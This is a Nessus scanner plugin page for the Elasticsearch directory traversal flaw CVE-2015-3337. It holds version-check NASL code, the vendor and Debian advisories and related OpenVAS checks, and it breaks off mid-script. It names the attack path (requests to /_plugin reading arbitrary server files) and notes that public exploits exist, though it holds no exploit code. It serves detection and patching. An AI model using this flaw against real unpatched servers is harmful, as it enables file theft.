FreeBSD : elasticsearch -- directory traversal attack with site plugins (a71e7440-1ba3-11e5-b43d-002590263bf5)
2015-06-26T00:00:00
ID FREEBSD_PKG_A71E74401BA311E5B43D002590263BF5.NASL Type nessus Reporter This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2015-06-26T00:00:00
Description
Elastic reports:
Vulnerability Summary: All Elasticsearch versions prior to 1.5.2 and
1.4.5 are vulnerable to a directory traversal attack that allows an
attacker to retrieve files from the server running Elasticsearch when
one or more site plugins are installed, or when Windows is the server
OS.
Remediation Summary: Users should upgrade to 1.4.5 or 1.5.2. Users
that do not want to upgrade can address the vulnerability by disabling
site plugins. See the CVE description for additional options.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from the FreeBSD VuXML database :
#
# Copyright 2003-2018 Jacques Vidrine and contributors
#
# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,
# HTML, PDF, PostScript, RTF and so forth) with or without modification,
# are permitted provided that the following conditions are met:
# 1. Redistributions of source code (VuXML) must retain the above
# copyright notice, this list of conditions and the following
# disclaimer as the first lines of this file unmodified.
# 2. Redistributions in compiled form (transformed to other DTDs,
# published online in any format, converted to PDF, PostScript,
# RTF and other formats) must reproduce the above copyright
# notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
#
# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
  # Plugin identity and revision bookkeeping.
  script_id(84413);
  script_version("2.6");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/06");

  # External identifiers for the tracked flaw (CVE, BID, Exploit-DB entry).
  script_cve_id("CVE-2015-3337");
  script_bugtraq_id(74353);
  script_xref(name:"EDB-ID", value:"37054");

  script_name(english:"FreeBSD : elasticsearch -- directory traversal attack with site plugins (a71e7440-1ba3-11e5-b43d-002590263bf5)");
  script_summary(english:"Checks for updated packages in pkg_info output");

  # Report text, carried over verbatim from the FreeBSD VuXML entry.
  script_set_attribute(attribute:"synopsis", value:
"The remote FreeBSD host is missing one or more security-related
updates.");
  script_set_attribute(attribute:"description", value:
"Elastic reports :
Vulnerability Summary: All Elasticsearch versions prior to 1.5.2 and
1.4.5 are vulnerable to a directory traversal attack that allows an
attacker to retrieve files from the server running Elasticsearch when
one or more site plugins are installed, or when Windows is the server
OS.
Remediation Summary: Users should upgrade to 1.4.5 or 1.5.2. Users
that do not want to upgrade can address the vulnerability by disabling
site plugins. See the CVE description for additional options.");

  # References; the comments hold the long URLs behind the Tenable short links.
  script_set_attribute(attribute:"see_also", value:"https://www.elastic.co/community/security");
  script_set_attribute(attribute:"see_also", value:"https://www.elastic.co/blog/elasticsearch-1-5-2-and-1-4-5-released");
  # https://packetstormsecurity.com/files/131646/Elasticsearch-Directory-Traversal.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?6b1f8241");
  # http://www.securityfocus.com/archive/1/535385
  script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/535385");
  # https://vuxml.freebsd.org/freebsd/a71e7440-1ba3-11e5-b43d-002590263bf5.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?1636fb0c");
  script_set_attribute(attribute:"solution", value:"Update the affected packages.");

  # Scoring: CVSSv2 base 4.3 (network, medium complexity, partial confidentiality
  # loss only); a public proof of concept exists, hence the temporal vector and
  # the exploit flags below.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  # Credentialed local check against the FreeBSD package database.
  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:elasticsearch");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:freebsd:freebsd");

  script_set_attribute(attribute:"vuln_publication_date", value:"2015/04/27");
  script_set_attribute(attribute:"patch_publication_date", value:"2015/06/26");
  script_set_attribute(attribute:"plugin_publication_date", value:"2015/06/26");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"FreeBSD Local Security Checks");

  # Requires an SSH session plus the collected FreeBSD release and pkg_info output.
  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/FreeBSD/release", "Host/FreeBSD/pkg_info");

  exit(0);
}
include("audit.inc");
include("freebsd_package.inc");
# Bail out (via audit(), which exits) unless this is a FreeBSD host whose
# package inventory was collected over the credentialed session.
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/FreeBSD/release")) audit(AUDIT_OS_NOT, "FreeBSD");
if (!get_kb_item("Host/FreeBSD/pkg_info")) audit(AUDIT_PACKAGE_LIST_MISSING);

# Vulnerable ranges taken from the VuXML entry: everything before 1.4.5 and
# the 1.5.x line before 1.5.2.  Every range is tested (not short-circuited)
# so that pkg_report_get() lists each installed match.
#
# Detection is purely version-based: it does not check whether any site
# plugin is actually installed or whether the advisory's non-upgrade
# workarounds are in place, so a host mitigated without upgrading is still
# reported as affected.
vuln_ranges = make_list("elasticsearch<1.4.5", "elasticsearch>=1.5.0<1.5.2");

flag = 0;
foreach vuln_pkg (vuln_ranges)
{
  if (pkg_test(save_report:TRUE, pkg:vuln_pkg)) flag++;
}

if (!flag) audit(AUDIT_HOST_NOT, "affected");

# At least one vulnerable package was found; include the accumulated
# package report when the scan asks for verbose output.
if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());
else security_warning(0);
exit(0);
{"id": "FREEBSD_PKG_A71E74401BA311E5B43D002590263BF5.NASL", "bulletinFamily": "scanner", "title": "FreeBSD : elasticsearch -- directory traversal attack with site plugins (a71e7440-1ba3-11e5-b43d-002590263bf5)", "description": "Elastic reports :\n\nVulnerability Summary: All Elasticsearch versions prior to 1.5.2 and\n1.4.5 are vulnerable to a directory traversal attack that allows an\nattacker to retrieve files from the server running Elasticsearch when\none or more site plugins are installed, or when Windows is the server\nOS.\n\nRemediation Summary: Users should upgrade to 1.4.5 or 1.5.2. Users\nthat do not want to upgrade can address the vulnerability by disabling\nsite plugins. See the CVE description for additional options.", "published": "2015-06-26T00:00:00", "modified": "2015-06-26T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "href": "https://www.tenable.com/plugins/nessus/84413", "reporter": "This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.", "references": ["http://www.nessus.org/u?1636fb0c", "https://www.securityfocus.com/archive/1/535385", "http://www.nessus.org/u?6b1f8241", "https://www.elastic.co/community/security", "https://www.elastic.co/blog/elasticsearch-1-5-2-and-1-4-5-released"], "cvelist": ["CVE-2015-3337"], "type": "nessus", "lastseen": "2021-01-07T10:48:54", "edition": 22, "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-3337"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14437", "SECURITYVULNS:DOC:31992", "SECURITYVULNS:DOC:31990"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310703241", "OPENVAS:703241", "OPENVAS:1361412562310105265"]}, {"type": "exploitdb", "idList": ["EDB-ID:37054"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3241-1:66E01"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:C495535BB475BBDF733BEC03D1BDE040"]}, {"type": "freebsd", "idList": ["A71E7440-1BA3-11E5-B43D-002590263BF5"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:131718"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-3241.NASL"]}], "modified": "2021-01-07T10:48:54", "rev": 2}, "score": {"value": 5.3, "vector": "NONE", "modified": "2021-01-07T10:48:54", "rev": 2}, "vulnersScore": 5.3}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84413);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-3337\");\n script_bugtraq_id(74353);\n script_xref(name:\"EDB-ID\", value:\"37054\");\n\n script_name(english:\"FreeBSD : elasticsearch -- directory traversal attack with site plugins (a71e7440-1ba3-11e5-b43d-002590263bf5)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Elastic reports :\n\nVulnerability Summary: All Elasticsearch versions prior to 1.5.2 and\n1.4.5 are vulnerable 
to a directory traversal attack that allows an\nattacker to retrieve files from the server running Elasticsearch when\none or more site plugins are installed, or when Windows is the server\nOS.\n\nRemediation Summary: Users should upgrade to 1.4.5 or 1.5.2. Users\nthat do not want to upgrade can address the vulnerability by disabling\nsite plugins. See the CVE description for additional options.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.elastic.co/community/security\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.elastic.co/blog/elasticsearch-1-5-2-and-1-4-5-released\"\n );\n # https://packetstormsecurity.com/files/131646/Elasticsearch-Directory-Traversal.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6b1f8241\"\n );\n # http://www.securityfocus.com/archive/1/535385\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.securityfocus.com/archive/1/535385\"\n );\n # https://vuxml.freebsd.org/freebsd/a71e7440-1ba3-11e5-b43d-002590263bf5.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1636fb0c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:elasticsearch\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/26\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"elasticsearch<1.4.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"elasticsearch>=1.5.0<1.5.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "FreeBSD Local Security Checks", "pluginID": "84413", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:elasticsearch"], "scheme": null}
{"cve": [{"lastseen": "2020-12-09T20:03:03", "description": "Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.", "edition": 5, "cvss3": {}, "published": "2015-05-01T15:59:00", "title": "CVE-2015-3337", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3337"], "modified": "2015-06-25T16:07:00", "cpe": ["cpe:/a:elasticsearch:elasticsearch:1.5.0", "cpe:/a:elasticsearch:elasticsearch:1.5.1", "cpe:/a:elasticsearch:elasticsearch:1.4.4"], "id": "CVE-2015-3337", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3337", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:elasticsearch:elasticsearch:1.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:elasticsearch:elasticsearch:1.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:elasticsearch:elasticsearch:1.5.1:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:58", "bulletinFamily": "software", "cvelist": ["CVE-2015-3337"], "description": "\r\n\r\nSummary:\r\nAll Elasticsearch versions prior to 1.5.2 and 1.4.5 are vulnerable to a directory traversal attack that allows an attacker to retrieve files from the server running Elasticsearch. This vulnerability is not present in the initial installation of Elasticsearch. The vulnerability is exposed when a \u201csite plugin\u201d is installed. Elastic\u2019s Marvel plugin and many community-sponsored plugins (e.g. 
Kopf, BigDesk, Head) are site plugins. Elastic Shield, Licensing, Cloud-AWS, Cloud-GCE, Cloud-Azure, the analysis plugins, and the river plugins are not site plugins.\r\n\r\nWe have been assigned CVE-2015-3337 for this issue.\r\n\r\n\r\nFixed versions:\r\nVersions 1.5.2 and 1.4.5 have addressed the vulnerability.\r\n\r\n\r\nRemediation:\r\nUsers should upgrade to 1.5.2 or 1.4.5. This will address the vulnerability and preserve site plugin functionality.\r\n\r\nUsers that do not want to upgrade can address the vulnerability in several ways, but these options will break any site plugin:\r\n- Set \u201chttp.disable_sites\u201d to true and restart the Elasticsearch node.\r\n- Use a firewall or proxy to block HTTP requests to /_plugin.\r\n- Uninstall all site plugins from all Elasticsearch nodes.\r\n\r\n\r\nCredit:\r\nJohn Heasman of DocuSign reported this issue.\r\n\r\n\r\nCVSS\r\nOverall CVSS score: 4.3\r\n\r\n", "edition": 1, "modified": "2015-05-05T00:00:00", "published": "2015-05-05T00:00:00", "id": "SECURITYVULNS:DOC:31992", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31992", "title": "Elasticsearch vulnerability CVE-2015-3337", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:58", "bulletinFamily": "software", "cvelist": ["CVE-2015-3337"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-3241-1 security@debian.org\r\nhttp://www.debian.org/security/ Moritz Muehlenhoff\r\nApril 29, 2015 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : elasticsearch\r\nCVE ID : CVE-2015-3337\r\n\r\nJohn Heasman discovered that the site plugin handling of the\r\nElasticsearch search engine was susceptible to directory traversal.\r\n\r\nFor the stable 
distribution (jessie), this problem has been fixed in\r\nversion 1.0.3+dfsg-5+deb8u1.\r\n\r\nFor the unstable distribution (sid), this problem will be fixed soon.\r\n\r\nWe recommend that you upgrade your elasticsearch packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: https://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1\r\n\r\niQIcBAEBAgAGBQJVQT+hAAoJEBDCk7bDfE42jx8P/RaRyGnWhAqU0IGWoQOb8j2/\r\nz2g1Sk9DWHepcuGPIwtF9KXUFFYWCSyjuwouWYMxQanb/Ue9wMo+olZrcZ1yYSnT\r\nIjRNwLkcbXsN2M+nAw6cxJzEq1/RFis5G740xkTUYyhxRSuAWZSV6JzbTWl7dq2g\r\nRsZ1gnNZj2kUlMSJjK6640qw6MYNIjjsEDiEN+X7jHohuN2Hkpg+4Rgqg+CvArCo\r\nM3Ltz8Fpc2jc0quQZYoU2BNyyjfEowc76ejeMYxlItKHo8y00m68JrTfR1jMj0R5\r\nwvZlgU0F18DX28qznKHdsy82JBwkYzvwpls2RfMkugY8ZM8CkcVwFFFLhvZWDwrU\r\nEL6Afr7DZSqt8mrnzYtGUAJ5Ix3ZgpD+zyXTQbfqiV/+fqKuU9al+JAFQgjquvkr\r\n3UfA2KTQL4M82KBgU40XcDVIr8LCi6ywvUtfEDENnPG1JJ/9CQ/2DKTu7AADyD71\r\nyBoz2e7H2+ObbbCbPwTWqoofYJfGQabJ7LDdvFOrXwM/KNL/QeUNP54Zvvo4ix0Y\r\nDkbtW2VamVU+u96XBqJEpVJcd2xAqbNliJCppOe5dxrgOhem8Oy90gMzhzKfrEqM\r\n7836ldqOECKwQGpbEBG+XshTEjslBBb3YLJzlIEFfMzbVZMnzbW+XuLpUoUa4pMw\r\nrTK6iUAcCzYaLd7/mOms\r\n=2XrL\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2015-05-05T00:00:00", "published": "2015-05-05T00:00:00", "id": "SECURITYVULNS:DOC:31990", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31990", "title": "[SECURITY] [DSA 3241-1] elasticsearch security update", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:00", "bulletinFamily": "software", "cvelist": ["CVE-2015-3337"], "description": "Directory traversal via requests to /_plugin", "edition": 1, "modified": "2015-05-05T00:00:00", "published": "2015-05-05T00:00:00", "id": 
"SECURITYVULNS:VULN:14437", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14437", "title": "Elasticsearch directory traversal", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "openvas": [{"lastseen": "2017-07-24T12:53:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3337"], "description": "John Heasman discovered that the site plugin handling of the\nElasticsearch search engine was susceptible to directory traversal.", "modified": "2017-07-07T00:00:00", "published": "2015-04-29T00:00:00", "id": "OPENVAS:703241", "href": "http://plugins.openvas.org/nasl.php?oid=703241", "type": "openvas", "title": "Debian Security Advisory DSA 3241-1 (elasticsearch - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3241.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3241-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703241);\n script_version(\"$Revision: 6609 $\");\n script_cve_id(\"CVE-2015-3337\");\n script_name(\"Debian Security Advisory DSA 3241-1 (elasticsearch - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-04-29 00:00:00 +0200 (Wed, 29 Apr 2015)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3241.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"elasticsearch on Debian Linux\");\n script_tag(name: \"insight\", value: \"Elasticsearch is a distributed RESTful search engine built for the cloud.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie), this problem has been fixed in\nversion 1.0.3+dfsg-5+deb8u1.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your elasticsearch packages.\");\n script_tag(name: \"summary\", value: \"John Heasman discovered that the site plugin handling of the\nElasticsearch search engine was susceptible to directory traversal.\");\n 
script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"elasticsearch\", ver:\"1.0.3+dfsg-5+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:36:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3337"], "description": "John Heasman discovered that the site plugin handling of the\nElasticsearch search engine was susceptible to directory traversal.", "modified": "2019-03-18T00:00:00", "published": "2015-04-29T00:00:00", "id": "OPENVAS:1361412562310703241", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703241", "type": "openvas", "title": "Debian Security Advisory DSA 3241-1 (elasticsearch - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3241.nasl 14278 2019-03-18 14:47:26Z cfischer $\n# Auto-generated from advisory DSA 3241-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703241\");\n script_version(\"$Revision: 14278 $\");\n script_cve_id(\"CVE-2015-3337\");\n script_name(\"Debian Security Advisory DSA 3241-1 (elasticsearch - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:47:26 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-04-29 00:00:00 +0200 (Wed, 29 Apr 2015)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2015/dsa-3241.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"elasticsearch on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie), this problem has been fixed in\nversion 1.0.3+dfsg-5+deb8u1.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your elasticsearch packages.\");\n script_tag(name:\"summary\", value:\"John Heasman discovered that the site plugin handling of the\nElasticsearch search engine was susceptible to directory traversal.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using 
